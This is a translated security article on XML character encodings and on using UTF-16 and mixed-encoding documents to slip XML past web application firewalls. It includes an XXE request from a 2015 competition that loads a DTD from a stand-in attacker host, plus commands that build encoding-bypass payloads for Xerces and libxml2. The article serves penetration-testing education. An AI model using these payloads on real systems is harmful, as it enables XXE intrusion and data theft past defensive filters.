Evil XML with two encodings

WAFs see white noise instead of a document!

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE".?.>.<.a.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	>.1.3.3.7.<./.a.
00000040	3E	>

This article is a short story about encodings in XML and about using them to bypass WAFs.

What encodings work in XML

The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Many parsers support more, but these two are enough for the attack.

UTF-8 and UTF-16 represent the same characters, those of the Unicode table.

The difference between the encodings is how they store the character's code point.
UTF-8
One character - from one to four bytes.

The character code is stored in a pattern:

Number of bytes	Significant bits	Binary code
1	7	0xxxxxxx
2	11	110xxxxx 10xxxxxx
3	16	1110xxxx 10xxxxxx 10xxxxxx
4	21	11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

Overlong encodings are forbidden: a character must be written in the shortest form that fits it.
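The table can be turned into a small encoder. The sketch below is illustrative only: `utf8_encode` and `is_valid_utf8` are names made up for this example, and the encoder skips the check for the reserved surrogate range. It also shows Python's strict decoder rejecting `C0 BC`, an overlong two-byte form of `<`.

```python
def utf8_encode(code_point: int) -> bytes:
    """Encode one code point with the shortest pattern from the table.

    Simplification: surrogates (U+D800..U+DFFF) are not rejected here.
    """
    if code_point < 0x80:        # up to 7 bits:  0xxxxxxx
        return bytes([code_point])
    if code_point < 0x800:       # up to 11 bits: 110xxxxx 10xxxxxx
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:     # up to 16 bits: 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    return bytes([0xF0 | (code_point >> 18),   # up to 21 bits, four bytes
                  0x80 | ((code_point >> 12) & 0x3F),
                  0x80 | ((code_point >> 6) & 0x3F),
                  0x80 | (code_point & 0x3F)])


def is_valid_utf8(data: bytes) -> bool:
    """True if Python's strict UTF-8 decoder accepts the bytes."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


print(utf8_encode(0x3C).hex())      # 3c: "<" fits into one byte
print(is_valid_utf8(b"\xc0\xbc"))   # False: overlong two-byte form of "<"
```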

UTF-16
One character - two or four bytes.

The character code is stored in a pattern:

Number of bytes	Significant bits	Binary code
2	16	xxxxxxxx xxxxxxxx
4 *	20	110110xx xxxxxxxx 110111xx xxxxxxxx

* 0x010000 is subtracted from the code point before it is encoded

A character written with 4 bytes is called a surrogate pair. The pair consists of two ordinary 16-bit units taken from a reserved range: U+D800 to U+DFFF. Neither half of the pair is valid on its own.
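The arithmetic behind a surrogate pair can be sketched in a few lines. `to_surrogate_pair` is a helper name invented for this illustration. It subtracts 0x10000 and splits the remaining 20 bits into two 10-bit halves.

```python
from typing import Tuple


def to_surrogate_pair(code_point: int) -> Tuple[int, int]:
    """Split a code point above U+FFFF into its two UTF-16 code units."""
    if not 0x10000 <= code_point <= 0x10FFFF:
        raise ValueError("only code points above U+FFFF need a surrogate pair")
    offset = code_point - 0x10000        # 20 significant bits remain
    high = 0xD800 | (offset >> 10)       # 110110xx xxxxxxxx
    low = 0xDC00 | (offset & 0x3FF)      # 110111xx xxxxxxxx
    return high, low


high, low = to_surrogate_pair(0x1D6E5)
print(f"{high:04X} {low:04X}")           # D835 DEE5

# The same four bytes come out of Python's own UTF-16BE encoder.
manual = high.to_bytes(2, "big") + low.to_bytes(2, "big")
print(manual == "\U0001D6E5".encode("utf-16-be"))   # True
```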

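UTF-16 comes in two variants: UTF-16BE and UTF-16LE (big-endian / little-endian). They differ in byte order.

Big-endian is the “natural” byte order: the most significant byte comes first, just as the most significant digit comes first in Arabic numerals.
Little-endian is the reverse: the least significant byte comes first.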

Examples of writing characters in UTF-16BE and UTF-16LE

Encoding	Character	Binary code
UTF-16BE	U+003F	00000000 00111111
UTF-16LE	U+003F	00111111 00000000
UTF-16BE *	U+1D6E5	11011000 00110101 11011110 11100101
UTF-16LE *	U+1D6E5	00110101 11011000 11100101 11011110

* In four-byte characters, each 2-byte unit is byte-swapped separately; the order of the units does not change. This is done for backward compatibility with Unicode 1.0, where all characters consisted of only two bytes.
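The byte orders in the table can be reproduced with Python's built-in `utf-16-be` and `utf-16-le` codecs. `swap_byte_order` is a helper written for this sketch. It swaps the bytes inside every 2-byte unit and leaves the order of the units alone, which is exactly the difference between the two variants.

```python
def swap_byte_order(data: bytes) -> bytes:
    """Swap the two bytes inside every 16-bit unit (input length must be even)."""
    swapped = bytearray(data)
    swapped[0::2], swapped[1::2] = data[1::2], data[0::2]
    return bytes(swapped)


for ch in ("\u003F", "\U0001D6E5"):
    be = ch.encode("utf-16-be")
    le = ch.encode("utf-16-le")
    print(f"U+{ord(ch):04X}  BE={be.hex(' ')}  LE={le.hex(' ')}")
    # Units keep their order; only the bytes inside each unit are flipped.
    assert swap_byte_order(be) == le
```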

How parsers determine the encoding

Parsers determine the encoding in four ways:

External encoding information
Some network protocols have a special field for encoding:

Figure: passing the encoding in WebDAV

Most often, these are protocols that are built according to the MIME standard: for example, SMTP, HTTP, and WebDAV.

Byte Order Mark (BOM)

The BOM is the character with code U+FEFF.

If the parser finds it at the very beginning of the document, it determines the encoding from the bytes the BOM is written with.

Popular encodings and their BOMs

Encoding	BOM	Example (hex)	Example (text)
UTF-8	EF BB BF	EF BB BF 3C 3F 78 6D 6C	...<?xml
UTF-16BE	FE FF	FE FF 00 3C 00 3F 00 78 00 6D 00 6C	...<.?.x.m.l
UTF-16LE	FF FE	FF FE 3C 00 3F 00 78 00 6D 00 6C 00	..<.?.x.m.l.

The BOM works only at the beginning of the document. In the middle, U+FEFF is read as a special space (a zero-width no-break space) or causes an error.
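A BOM check amounts to comparing the first bytes with a few known prefixes. The sketch below covers only the three encodings from the table. `encoding_from_bom` is a name chosen for this example, not a parser API. The BOM constants come from Python's standard `codecs` module.

```python
import codecs
from typing import Optional

# BOM bytes for the three encodings in the table above.
BOMS = (
    (codecs.BOM_UTF8, "UTF-8"),          # EF BB BF
    (codecs.BOM_UTF16_BE, "UTF-16BE"),   # FE FF
    (codecs.BOM_UTF16_LE, "UTF-16LE"),   # FF FE
)


def encoding_from_bom(data: bytes) -> Optional[str]:
    """Return the encoding implied by a leading BOM, or None if there is none."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None


print(encoding_from_bom(bytes.fromhex("FE FF 00 3C 00 3F")))   # UTF-16BE
print(encoding_from_bom(b"<?xml"))                             # None
```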

By the first characters of the document

The specification allows the parser to look at the first four bytes and determine the encoding from them:

Encoding	Document start (hex)	Document start (text)
UTF-8, ISO 646, ASCII	3C 3F 78 6D	<?xm
UTF-16BE	00 3C 00 3F	.<.?
UTF-16LE	3C 00 3F 00	<.?.

This only works for documents that start with an XML declaration.
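As a rough sketch, this detection is a lookup on the first four bytes. Only the three rows of the table are covered here, and `sniff_encoding` is a hypothetical helper name. Real parsers know more signatures.

```python
from typing import Optional

# First four bytes of "<?xm" in each encoding family from the table.
SIGNATURES = {
    bytes.fromhex("3C 3F 78 6D"): "ASCII-compatible (UTF-8, ISO 646, ASCII)",
    bytes.fromhex("00 3C 00 3F"): "UTF-16BE",
    bytes.fromhex("3C 00 3F 00"): "UTF-16LE",
}


def sniff_encoding(data: bytes) -> Optional[str]:
    """Guess the encoding family from the first four bytes, if they are known."""
    return SIGNATURES.get(data[:4])


declaration = '<?xml version="1.0"?>'
print(sniff_encoding(declaration.encode("utf-16-le")))   # UTF-16LE
print(sniff_encoding(b"<a>1337</a>"))                    # None: no XML declaration
```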

From the XML declaration

The encoding can be specified in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?>

The XML declaration is a line written at the very beginning of the document. It tells the parser how to read the rest: the XML version and the encoding.

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <très>là</très>

A document encoded in ISO-8859-1

It might seem that to read the declaration, the parser must already know the encoding. But the declaration is useful for distinguishing between similar encodings, for example the ASCII-compatible ones.
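The ISO-8859-1 example shows why the declaration matters among ASCII-compatible encodings. In the sketch below, `declared_encoding` is an illustrative helper that uses a simplified regular expression, not a full XML parser. The declaration itself is plain ASCII, so it can be read before the encoding is known, and the declared name is then used to decode the whole document.

```python
import re
from typing import Optional

# Simplified pattern for the encoding attribute of an ASCII-compatible declaration.
ENCODING_RE = re.compile(
    rb'^<\?xml[^>]*?\sencoding\s*=\s*["\']([A-Za-z][A-Za-z0-9._-]*)["\']'
)


def declared_encoding(data: bytes) -> Optional[str]:
    """Return the encoding name from the XML declaration, if one is present."""
    match = ENCODING_RE.match(data)
    return match.group(1).decode("ascii") if match else None


raw = '<?xml version="1.0" encoding="ISO-8859-1"?><très>là</très>'.encode("iso-8859-1")

name = declared_encoding(raw)
print(name)                # ISO-8859-1
print(raw.decode(name))    # the accented letters come out intact

# Guessing UTF-8 instead fails on the very first accented byte.
try:
    raw.decode("utf-8")
except UnicodeDecodeError as error:
    print("not valid UTF-8:", error.reason)
```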

Standard WAF bypass

The easiest option is to switch to an encoding that is incompatible with ASCII and hope that the WAF does not understand it.

This method worked in the WAF Bypass competition in 2015. Participants had to read a flag through an XXE vulnerability:

XXE exploitation request from the competition

POST / HTTP/1.1
Host: d3rr0r1m.waf-bypass.phdays.com
Connection: close
Content-Type: text/xml
User-Agent: Mozilla/5.0
Content-Length: 166

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
    %xxe;
]>
<root>
    <method>test</method>
</root>

One solution is to transcode the request body into UTF-16BE without a BOM:

 cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml

The WAF saw nothing dangerous in this document and let the request through.
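Why transcoding helps can be shown with a deliberately naive filter. `naive_filter_blocks` below is a hypothetical stand-in for a WAF rule that searches the raw body for ASCII signatures. It is not how any particular product works. The exact whitespace of the competition request is also an assumption.

```python
XXE_BODY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE root [\n'
    '<!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">\n'
    '%xxe;\n'
    ']>\n'
    '<root><method>test</method></root>\n'
)


def naive_filter_blocks(body: bytes) -> bool:
    """Hypothetical rule: block bodies that contain DTD keywords as ASCII bytes."""
    return any(sig in body for sig in (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM"))


plain = XXE_BODY.encode("utf-8")
# Same result as `iconv -f UTF-8 -t UTF-16BE`: two bytes per character, no BOM.
transcoded = XXE_BODY.encode("utf-16-be")

print(naive_filter_blocks(plain))        # True: the keywords are visible
print(naive_filter_blocks(transcoded))   # False: a zero byte precedes every ASCII character
```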

Bypass using two encodings

Another way to confuse a WAF is to encode the XML in two encodings at once.

When the parser reads the encoding from the declaration, it immediately switches to it, even if it is incompatible with the encoding in which the declaration itself is written.

If the declaration and the rest of the document are in different encodings, a WAF that reads the whole document in a single encoding will not understand anything.

Xerces2 Java Parser

The declaration is in ASCII, the rest of the document in UTF-16BE:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 223F 3E00 3C00 6100 3E00	F-16BE"?>.<.a.>.
00000030	3100 3300 3300 3700 3C00 2F00 6100 3E	1.3.3.7.<./.a.>

Commands to generate it:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
 echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
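The same payload can be built in Python, which makes it easy to compare the bytes with the hex dump. This is only a sketch: the constant names are arbitrary, and the body is written without a trailing newline so that it matches the dump exactly. The final line mimics what the article describes the parser doing: ASCII up to the end of the declaration, UTF-16BE after it.

```python
DECLARATION = '<?xml version="1.0" encoding="UTF-16BE"?>'
BODY = "<a>1337</a>"

# ASCII declaration followed by a UTF-16BE body, with no BOM.
payload = DECLARATION.encode("ascii") + BODY.encode("utf-16-be")

# Bytes copied from the hex dump above.
EXPECTED = bytes.fromhex(
    "3C3F 786D 6C20 7665 7273 696F 6E3D 2231"
    "2E30 2220 656E 636F 6469 6E67 3D22 5554"
    "462D 3136 4245 223F 3E00 3C00 6100 3E00"
    "3100 3300 3300 3700 3C00 2F00 6100 3E"
)
print(payload == EXPECTED)   # True

# Decode each part in its own encoding, switching right after the declaration.
split = len(DECLARATION)
print(payload[:split].decode("ascii") + payload[split:].decode("utf-16-be"))
```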

libxml2

libxml2 switches the encoding as soon as it has read the encoding attribute. So we change the encoding before the declaration is closed:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE".?.>.<.a.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	>.1.3.3.7.<./.a.
00000040	3E	>

Commands to generate it:

 echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
 echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
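To see the "white noise" from the point of view of a filter, the libxml2-style payload can be built in Python and then decoded as a whole in each of the two encodings. This is a sketch with made-up constant names, and the trailing newline that `echo` would add is left out. Neither single-encoding view contains the element `<a>`.

```python
HEAD = '<?xml version="1.0" encoding="UTF-16BE"'   # ASCII, ends right after the attribute
TAIL = "?><a>1337</a>"                             # UTF-16BE from here on

payload = HEAD.encode("ascii") + TAIL.encode("utf-16-be")
print(len(payload))   # 65 bytes, offsets 0x00 to 0x40 as in the dump

# Read everything as ASCII: the tail has a NUL byte before every character.
as_ascii = payload.decode("ascii")
# Read everything as UTF-16BE: the head has an odd length, so the units are misaligned.
as_utf16 = payload.decode("utf-16-be", errors="replace")

print("<a>" in as_ascii, "<a>" in as_utf16)   # False False
```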

Successful pentest!

Source: https://habr.com/ru/post/340000/
